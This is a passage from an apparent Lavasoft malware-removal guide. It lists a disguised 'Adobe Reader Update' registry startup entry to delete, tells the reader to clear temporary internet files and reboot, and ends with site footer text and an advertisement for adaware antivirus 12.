    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Reader Update" = "%Documents and Settings%\%current user%\Application Data\acrobatreader.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now